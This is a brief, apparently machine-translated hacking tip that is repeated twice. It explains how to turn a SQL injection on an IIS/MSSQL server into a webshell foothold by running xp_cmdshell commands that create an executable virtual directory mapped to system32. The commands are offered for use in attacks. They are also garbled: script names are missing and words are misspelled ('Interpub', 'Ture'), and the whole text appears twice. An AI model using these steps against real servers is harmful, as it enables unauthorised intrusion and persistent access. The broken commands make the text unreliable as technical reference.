SQL injection creates a virtual directory to avoid finding absolute web paths
----------------------------------------------------------------
In many cases, we encounter SQL injection that can list directories and run commands, but it is difficult to find the directory where the web is located, so it is difficult to get a webshell. This trick is good:
exec .xp_cmdshell 'cscript C:\Interpub\AdminScripts\ -c localhost -w "l" -v "win","c:\winnt\system32"'
Create a virtual directory win, point to c:\winnt\system32
exec .xp_cmdshell 'cscript C:\Interpub\AdminScripts\ w3svc/1/root/win/Accessexecute Ture'
Let win sentences have permission to parse asp scripts
exec .xp_cmdshell "cscript C:\Interpub\AdminScripts\ delete w3svc/1/root/win/"
Delete the virtual directory.
A solution to not find an absolute path to the web,
/win
403 error means that the virtual directory has been built. . .
----------------------------------------------------------------
In many cases, we encounter SQL injection that can list directories and run commands, but it is difficult to find the directory where the web is located, so it is difficult to get a webshell. This trick is good:
exec .xp_cmdshell 'cscript C:\Interpub\AdminScripts\ -c localhost -w "l" -v "win","c:\winnt\system32"'
Create a virtual directory win, point to c:\winnt\system32
exec .xp_cmdshell 'cscript C:\Interpub\AdminScripts\ w3svc/1/root/win/Accessexecute Ture'
Let win sentences have permission to parse asp scripts
exec .xp_cmdshell "cscript C:\Interpub\AdminScripts\ delete w3svc/1/root/win/"
Delete the virtual directory.
A solution to not find an absolute path to the web,
/win
403 error means that the virtual directory has been built. . .